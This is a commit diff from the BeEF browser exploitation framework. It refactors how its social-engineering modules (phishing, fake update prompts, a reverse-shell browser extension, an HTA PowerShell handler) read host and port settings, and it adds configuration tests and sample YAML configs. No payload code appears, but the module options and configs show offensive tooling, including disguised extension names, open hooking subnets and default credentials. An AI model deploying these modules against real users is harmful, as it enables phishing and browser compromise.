beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
hook_file = @configuration.get("beef.http.hook_file")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
hook_file = @configuration.hook_file_path
return [{
'name' => 'hook_url',

6
modules/social_engineering/clickjacking/module.rb
View File

@@ -8,9 +8,9 @@ class Clickjacking < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
uri = "#{base_host}/demos/clickjacking/clickjack_victim.html"

6
modules/social_engineering/clippy/module.rb
View File

@@ -14,9 +14,9 @@ class Clippy < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
return [

6
modules/social_engineering/fake_flash_update/module.rb
View File

@@ -13,9 +13,9 @@ class Fake_flash_update < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
image = "#{base_host}/adobe/flash_update.png"

6
modules/social_engineering/fake_notification_c/module.rb
View File

@@ -7,9 +7,9 @@ class Fake_notification_c < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
return [

4
modules/social_engineering/fake_notification_ff/module.rb
View File

@@ -7,9 +7,9 @@ class Fake_notification_ff < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
proto = @configuration.beef_proto
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
beef_port = @configuration.beef_port
url = "#{proto}://#{beef_host}:#{beef_port}/api/ipec/ff_extension"
return [
{'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url, 'width'=>'150px'},

6
modules/social_engineering/fake_notification_ie/module.rb
View File

@@ -7,9 +7,9 @@ class Fake_notification_ie < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
return [

2
modules/social_engineering/firefox_extension_bindshell/module.rb
View File

@@ -72,7 +72,7 @@ class Firefox_extension_bindshell < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_host = @configuration.beef_host
return [
{'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'},
{'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements'},

6
modules/social_engineering/firefox_extension_dropper/module.rb
View File

@@ -82,9 +82,9 @@ class Firefox_extension_dropper < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
return [
{'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'},

2
modules/social_engineering/firefox_extension_reverse_shell/module.rb
View File

@@ -75,7 +75,7 @@ class Firefox_extension_reverse_shell < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_host = @configuration.beef_host
return [
{'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'},
{'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements'},

6
modules/social_engineering/gmail_phishing/module.rb
View File

@@ -7,9 +7,9 @@ class Gmail_phishing < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
xss_hook_url = "#{base_host}/demos/basic.html"

20
modules/social_engineering/hta_powershell/module.rb
View File

@@ -4,25 +4,17 @@
# See the file 'doc/COPYING' for copying permission
#
class Hta_powershell < BeEF::Core::Command
def self.options
@config = BeEF::Core::Configuration.instance
ps_url = @config.get('beef.extension.social_engineering.powershell.powershell_handler_url')
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
base_host = "#{proto}://#{beef_host}:#{beef_port}"
ps_url = @configuration.get('beef.extension.social_engineering.powershell.powershell_handler_url')
return [
{'name' => 'domain', 'ui_label' => 'Serving Domain (BeEF server)', 'value' => "#{base_host}" },
{'name' => 'ps_url', 'ui_label' => 'Powershell/HTA handler', 'value' => "#{ps_url}"}
[
{ 'name' => 'domain', 'ui_label' => 'Serving Domain (BeEF server)', 'value' => @configuration.beef_url_str },
{ 'name' => 'ps_url', 'ui_label' => 'Powershell/HTA handler', 'value' => ps_url }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end

6
modules/social_engineering/pretty_theft/module.rb
View File

@@ -7,9 +7,9 @@ class Pretty_theft < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
logo_uri = "#{base_host}/ui/media/images/beef.png"
return [

6
modules/social_engineering/replace_video_fake_plugin/module.rb
View File

@@ -7,9 +7,9 @@ class Replace_video_fake_plugin < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = configuration.get("beef.http.public") || configuration.get("beef.http.host")
beef_port = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
proto = configuration.beef_proto
beef_host = configuration.beef_host
beef_port = configuration.beef_port
url = "#{proto}://#{beef_host}:#{beef_port}"
return [
{'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url+'/api/ipec/ff_extension', 'width'=>'150px'},

2
package-lock.json generated
View File

@@ -1,5 +1,5 @@
{
"name": "BeEF",
"version": "0.5.1.0",
"version": "0.5.2.0",
"lockfileVersion": 1
}

4
package.json
View File

@@ -1,6 +1,6 @@
{
"name": "BeEF",
"version": "0.5.1.0",
"version": "0.5.2.0",
"description": "The Browser Exploitation Framework Project",
"scripts": {
"docs": "./node_modules/.bin/jsdoc -c conf.json"
@@ -9,7 +9,7 @@
"license": "GNU General Public License v2.0",
"devDependencies": {
"jsdoc": "^3.6.4",
"jsdoc-to-markdown": "^6.0.1"
"jsdoc-to-markdown": "^7.0.1"
},
"dependencies": {}
}

10
spec/beef/core/main/command_spec.rb Normal file
View File

@@ -0,0 +1,10 @@
RSpec.describe 'BeEF Command class testing' do
it 'should return a beef configuration variable' do
BeEF::Modules.load
command_mock = BeEF::Core::Command.new('test_get_variable')
expect(command_mock.config.beef_host).to eq('0.0.0.0')
require 'modules/browser/hooked_domain/get_page_links/module'
gpl = Get_page_links.new('test_get_variable')
expect(gpl.config.beef_host).to eq('0.0.0.0')
end
end

257
spec/beef/core/main/configuration_spec.rb Normal file
View File

@@ -0,0 +1,257 @@
RSpec.configure do |config|
config.before(:context, :type => :old ) do
config = File.expand_path('../../../support/assets/config_old.yaml', __dir__)
@config_instance = BeEF::Core::Configuration.new(config)
end
config.before(:context) do
config = File.expand_path('../../../support/assets/config_new.yaml', __dir__)
@config_instance = BeEF::Core::Configuration.new(config)
end
end
RSpec.describe 'BeEF Configuration' do
context 'configuration validation', :type => :old do
it 'should error when using hold public config' do
@config_instance.set('beef.http.public', 'example.com')
expect(@config_instance.validate).to eq(nil)
end
it 'should error when using old public_port config' do
@config_instance.set('beef.http.public_port', 443)
expect(@config_instance.validate).to eq(nil)
end
end
context 'http local host configuration values' do
it 'should set the local host value to 0.0.0.0' do
@config_instance.set('beef.http.host', '0.0.0.0')
expect(@config_instance.get('beef.http.host')).to eq('0.0.0.0')
end
it 'should get the local host value' do
@config_instance.set('beef.http.host', '0.0.0.0')
expect(@config_instance.local_host).to eq('0.0.0.0')
end
it 'should get the default host value' do
@config_instance.set('beef.http.host', nil)
expect(@config_instance.get('beef.http.host')).to eq(nil)
expect(@config_instance.local_host).to eq('0.0.0.0')
end
end
context 'http local port configuration values' do
it 'should set the local port value to 3000' do
@config_instance.set('beef.http.port', '3000')
expect(@config_instance.get('beef.http.port')).to eq('3000')
end
it 'should get the local port value' do
@config_instance.set('beef.http.port', '3000')
expect(@config_instance.local_port).to eq('3000')
end
it 'should get the default port value' do
@config_instance.set('beef.http.port', nil)
expect(@config_instance.get('beef.http.port')).to eq(nil)
expect(@config_instance.local_port).to eq('3000')
end
end
context 'beef https enabled configuration values' do
it 'should set the https enabled config value' do
@config_instance.set('beef.http.https.enable', true)
expect(@config_instance.get('beef.http.https.enable')).to eq(true)
end
it 'should get https enabled value set to true' do
@config_instance.set('beef.http.https.enable', true)
expect(@config_instance.local_https_enabled).to eq(true)
end
it 'should get https enabled value set to false' do
@config_instance.set('beef.http.https.enable', false)
expect(@config_instance.local_https_enabled).to eq(false)
end
it 'should get the default https enabled value' do
@config_instance.set('beef.http.https.enable', nil)
expect(@config_instance.get('beef.http.https.enable')).to eq(nil)
expect(@config_instance.local_https_enabled).to eq(false)
end
end
#public
context 'http public host configuration values' do
it 'should set the public host value to example.com' do
@config_instance.set('beef.http.public.host', 'example.com')
expect(@config_instance.get('beef.http.public.host')).to eq('example.com')
end
it 'should get the public host value' do
@config_instance.set('beef.http.public.host', 'example.com')
expect(@config_instance.public_host).to eq('example.com')
end
it 'should get nil host value' do
@config_instance.set('beef.http.public.host', nil)
expect(@config_instance.get('beef.http.public.host')).to eq(nil)
expect(@config_instance.public_host).to eq(nil)
end
end
context 'http public port configuration values' do
it 'should set the public port value to 3000' do
@config_instance.set('beef.http.public.port', '443')
expect(@config_instance.get('beef.http.public.port')).to eq('443')
end
it 'should get the public port value' do
@config_instance.set('beef.http.public.port', '3000')
expect(@config_instance.public_port).to eq('3000')
end
it 'should return 80 as the port given a public host has been set and https disabled' do
@config_instance.set('beef.http.public.port', nil)
@config_instance.set('beef.http.public.host', 'example.com')
@config_instance.set('beef.http.public.https', false)
expect(@config_instance.get('beef.http.public.port')).to eq(nil)
expect(@config_instance.get('beef.http.public.host')).to eq('example.com')
expect(@config_instance.public_port).to eq('80')
end
end
context 'beef https enabled configuration values' do
it 'should set the https enabled config value' do
@config_instance.set('beef.http.https.enable', true)
expect(@config_instance.get('beef.http.https.enable')).to eq(true)
end
it 'should get https enabled value set to true' do
@config_instance.set('beef.http.public.https', true)
expect(@config_instance.public_https_enabled?).to eq(true)
end
it 'should get https enabled value set to false' do
@config_instance.set('beef.http.public.https', false)
expect(@config_instance.public_https_enabled?).to eq(false)
end
it 'should get the default https to false' do
@config_instance.set('beef.http.public.https', nil)
expect(@config_instance.get('beef.http.public.https')).to eq(nil)
expect(@config_instance.public_https_enabled?).to eq(false)
end
it 'should return public port as 443 if public https is enabled' do
@config_instance.set('beef.http.public.https', true)
@config_instance.set('beef.http.public.port', nil)
expect(@config_instance.get('beef.http.public.https')).to eq(true)
expect(@config_instance.get('beef.http.public.port')).to eq(nil)
expect(@config_instance.public_https_enabled?).to eq(true)
expect(@config_instance.public_port).to eq('443')
end
end
context 'beef hosting information' do
it 'should return the local host value because a public has not been set' do
@config_instance.set('beef.http.host', 'asdqwe')
@config_instance.set('beef.http.public.host', nil)
expect(@config_instance.get('beef.http.host')).to eq('asdqwe')
expect(@config_instance.get('beef.http.public.host')).to eq(nil)
expect(@config_instance.beef_host).to eq('asdqwe')
end
it 'should return the public host value because a public has been set' do
@config_instance.set('beef.http.host', 'asdqwe')
@config_instance.set('beef.http.public.host', 'poilkj')
expect(@config_instance.get('beef.http.host')).to eq('asdqwe')
expect(@config_instance.get('beef.http.public.host')).to eq('poilkj')
expect(@config_instance.beef_host).to eq('poilkj')
end
it 'should return the local port value because a public value has not been set' do
@config_instance.set('beef.http.port', '3000')
@config_instance.set('beef.http.public.host', nil)
@config_instance.set('beef.http.public.port', nil)
@config_instance.set('beef.http.public.https', nil)
expect(@config_instance.get('beef.http.port')).to eq('3000')
expect(@config_instance.get('beef.http.public.port')).to eq(nil)
expect(@config_instance.get('beef.http.public.host')).to eq(nil)
expect(@config_instance.get('beef.http.public.https')).to eq(nil)
expect(@config_instance.beef_port).to eq('3000')
end
it 'should return the public host value because a public has been set' do
@config_instance.set('beef.http.port', '3000')
@config_instance.set('beef.http.public.port', '80')
@config_instance.set('beef.http.public.host', nil)
expect(@config_instance.get('beef.http.port')).to eq('3000')
expect(@config_instance.get('beef.http.public.port')).to eq('80')
expect(@config_instance.get('beef.http.public.host')).to eq(nil)
expect(@config_instance.beef_port).to eq('80')
end
it 'should return a protocol https if https public has been enabled and public host is set' do
@config_instance.set('beef.http.public.https', true)
@config_instance.set('beef.http.public.host', 'public')
expect(@config_instance.get('beef.http.public.https')).to eq(true)
expect(@config_instance.beef_proto).to eq('https')
end
it 'should return a protocol http if public is not set and https local is fales' do
@config_instance.set('beef.http.public.https', false)
@config_instance.set('beef.http.https.enable', false)
expect(@config_instance.get('beef.http.public.https')).to eq(false)
expect(@config_instance.beef_proto).to eq('http')
end
it 'should return the full url string for beef local http and port 80' do
@config_instance.set('beef.http.host', 'localhost')
@config_instance.set('beef.http.port', '80')
@config_instance.set('beef.http.https.enable', false)
@config_instance.set('beef.http.public.https', false)
@config_instance.set('beef.http.public.host', nil)
@config_instance.set('beef.http.public.port', nil)
expect(@config_instance.get('beef.http.host')).to eq('localhost')
expect(@config_instance.get('beef.http.port')).to eq('80')
expect(@config_instance.get('beef.http.https.enable')).to eq(false)
expect(@config_instance.get('beef.http.public.https')).to eq(false)
expect(@config_instance.beef_url_str).to eq('http://localhost:80')
end
it 'should return the full url string for beef https localhost 3000 default' do
@config_instance.set('beef.http.host', 'localhost')
@config_instance.set('beef.http.port', nil)
@config_instance.set('beef.http.https.enable', true)
@config_instance.set('beef.http.public.host', nil)
@config_instance.set('beef.http.public.https', false)
@config_instance.set('beef.http.public.host', nil)
@config_instance.set('beef.http.public.port', nil)
expect(@config_instance.get('beef.http.host')).to eq('localhost')
expect(@config_instance.get('beef.http.port')).to eq(nil)
expect(@config_instance.get('beef.http.https.enable')).to eq(true)
expect(@config_instance.get('beef.http.public.https')).to eq(false)
expect(@config_instance.beef_url_str).to eq('https://localhost:3000')
end
it 'should return the full url string for beef hook url' do
@config_instance.set('beef.http.host', 'localhost')
@config_instance.set('beef.http.port', nil)
@config_instance.set('beef.http.https.enable', true)
@config_instance.set('beef.http.public.https', false)
@config_instance.set('beef.http.public.host', nil)
@config_instance.set('beef.http.public.port', nil)
@config_instance.set('beeg.http.hook_file', '/hook.js')
expect(@config_instance.get('beef.http.host')).to eq('localhost')
expect(@config_instance.get('beef.http.port')).to eq(nil)
expect(@config_instance.get('beef.http.https.enable')).to eq(true)
expect(@config_instance.get('beef.http.public.https')).to eq(false)
expect(@config_instance.get('beef.http.hook_file')).to eq('/hook.js')
expect(@config_instance.beef_url_str).to eq('https://localhost:3000')
expect(@config_instance.hook_url).to eq('https://localhost:3000/hook.js')
end
end
end

162
spec/support/assets/config_new.yaml Normal file
View File

@@ -0,0 +1,162 @@
#
# Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
version: '0.5.1.0'
# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
client_debug: false
# Used for generating secure tokens
crypto_default_value_length: 80
# Credentials to authenticate in BeEF.
# Used by both the RESTful API and the Admin interface
credentials:
user: "beef"
passwd: "beef"
# Interface / IP restrictions
restrictions:
# subnet of IP addresses that can hook to the framework
permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
# subnet of IP addresses that can connect to the admin UI
#permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
# subnet of IP addresses that cannot be hooked by the framework
excluded_hooking_subnet: []
# slow API calls to 1 every api_attempt_delay seconds
api_attempt_delay: "0.05"
# HTTP server
http:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host: "0.0.0.0"
port: "3000"
# Decrease this setting to 1,000 (ms) if you want more responsiveness
# when sending modules and retrieving results.
# NOTE: A poll timeout of less than 5,000 (ms) might impact performance
# when hooking lots of browsers (50+).
# Enabling WebSockets is generally better (beef.websocket.enable)
xhr_poll_timeout: 1000
# Host Name / Domain Name
# If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
# set the public hostname below:
#public: "" # public hostname/IP address
# Reverse Proxy / NAT
# If you want BeEF to be accessible behind a reverse proxy or NAT,
# set both the publicly accessible hostname/IP address and port below:
# NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
# by altering the X-FORWARDED-FOR ip address in the request header.
allow_reverse_proxy: false
# Public settings
# These settings will be used to create a public facing URL
# This public facing URL will be used for all hook related calls
public:
host: "example.com"
port: 443
https: true # public hostname/IP address
#public_port: "" # public port (experimental)
# Hook
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
# Allow one or multiple origins to access the RESTful API using CORS
# For multiple origins use: "http://browserhacker.com, http://domain2.com"
restful_api:
allow_cors: false
cors_allowed_domains: "http://browserhacker.com"
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
port: 61985 # WS: good success rate through proxies
# Use encrypted 'WebSocketSecure'
# NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
secure: true
secure_port: 61986 # WSSecure
ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command execute on it
ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: true
type: "apache" # Supported: apache, iis, nginx
hook_404: false # inject BeEF hook in HTTP 404 responses
hook_root: false # inject BeEF hook in the server home page
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# Enabled this config setting if you're external facing uri is using https
public_enabled: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.public (the domain name of the server where you run BeEF)
key: "beef_key.pem"
cert: "beef_cert.pem"
database:
file: "beef.db"
# Autorun Rule Engine
autorun:
# this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
# to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
# continue execution regardless of results.
# If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
result_poll_interval: 300
result_poll_timeout: 5000
# If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
# This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
continue_after_timeout: true
# Enables DNS lookups on zombie IP addresses
dns_hostname_lookup: false
# IP Geolocation
# NOTE: requires MaxMind database. Run ./updated-geoipdb to install.
geoip:
enable: true
database: '/opt/GeoIP/GeoLite2-City.mmdb'
# Integration with PhishingFrenzy
# If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
# to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
integration:
phishing_frenzy:
enable: false
# You may override default extension configuration parameters here
# Note: additional experimental extensions are available in the 'extensions' directory
# and can be enabled via their respective 'config.yaml' file
extension:
admin_ui:
enable: true
base_path: "/ui"
demos:
enable: true
events:
enable: true
evasion:
enable: false
requester:
enable: true
proxy:
enable: true
network:
enable: true
metasploit:
enable: false
social_engineering:
enable: true
xssrays:
enable: true

155
spec/support/assets/config_old.yaml Normal file
View File

@@ -0,0 +1,155 @@
#
# Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
version: '0.5.1.0'
# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
client_debug: false
# Used for generating secure tokens
crypto_default_value_length: 80
# Credentials to authenticate in BeEF.
# Used by both the RESTful API and the Admin interface
credentials:
user: "beef"
passwd: "beef"
# Interface / IP restrictions
restrictions:
# subnet of IP addresses that can hook to the framework
permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
# subnet of IP addresses that can connect to the admin UI
#permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
# subnet of IP addresses that cannot be hooked by the framework
excluded_hooking_subnet: []
# slow API calls to 1 every api_attempt_delay seconds
api_attempt_delay: "0.05"
# HTTP server
http:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host: "0.0.0.0"
port: "3000"
# Decrease this setting to 1,000 (ms) if you want more responsiveness
# when sending modules and retrieving results.
# NOTE: A poll timeout of less than 5,000 (ms) might impact performance
# when hooking lots of browsers (50+).
# Enabling WebSockets is generally better (beef.websocket.enable)
xhr_poll_timeout: 1000
# Host Name / Domain Name
# If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
# set the public hostname below:
#public: "" # public hostname/IP address
# Reverse Proxy / NAT
# If you want BeEF to be accessible behind a reverse proxy or NAT,
# set both the publicly accessible hostname/IP address and port below:
# NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
# by altering the X-FORWARDED-FOR ip address in the request header.
allow_reverse_proxy: false
#public: "example" # public hostname/IP address
#public_port: "" # public port (experimental)
# Hook
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
# Allow one or multiple origins to access the RESTful API using CORS
# For multiple origins use: "http://browserhacker.com, http://domain2.com"
restful_api:
allow_cors: false
cors_allowed_domains: "http://browserhacker.com"
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
port: 61985 # WS: good success rate through proxies
# Use encrypted 'WebSocketSecure'
# NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
secure: true
secure_port: 61986 # WSSecure
ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command execute on it
ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: true
type: "apache" # Supported: apache, iis, nginx
hook_404: false # inject BeEF hook in HTTP 404 responses
hook_root: false # inject BeEF hook in the server home page
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# Enabled this config setting if you're external facing uri is using https
public_enabled: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.public (the domain name of the server where you run BeEF)
key: "beef_key.pem"
cert: "beef_cert.pem"
database:
file: "beef.db"
# Autorun Rule Engine
autorun:
# this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
# to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
# continue execution regardless of results.
# If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
result_poll_interval: 300
result_poll_timeout: 5000
# If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
# This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
continue_after_timeout: true
# Enables DNS lookups on zombie IP addresses
dns_hostname_lookup: false
# IP Geolocation
# NOTE: requires MaxMind database. Run ./updated-geoipdb to install.
geoip:
enable: true
database: '/opt/GeoIP/GeoLite2-City.mmdb'
# Integration with PhishingFrenzy
# If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
# to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
integration:
phishing_frenzy:
enable: false
# You may override default extension configuration parameters here
# Note: additional experimental extensions are available in the 'extensions' directory
# and can be enabled via their respective 'config.yaml' file
extension:
admin_ui:
enable: true
base_path: "/ui"
demos:
enable: true
events:
enable: true
evasion:
enable: false
requester:
enable: true
proxy:
enable: true
network:
enable: true
metasploit:
enable: false
social_engineering:
enable: true
xssrays:
enable: true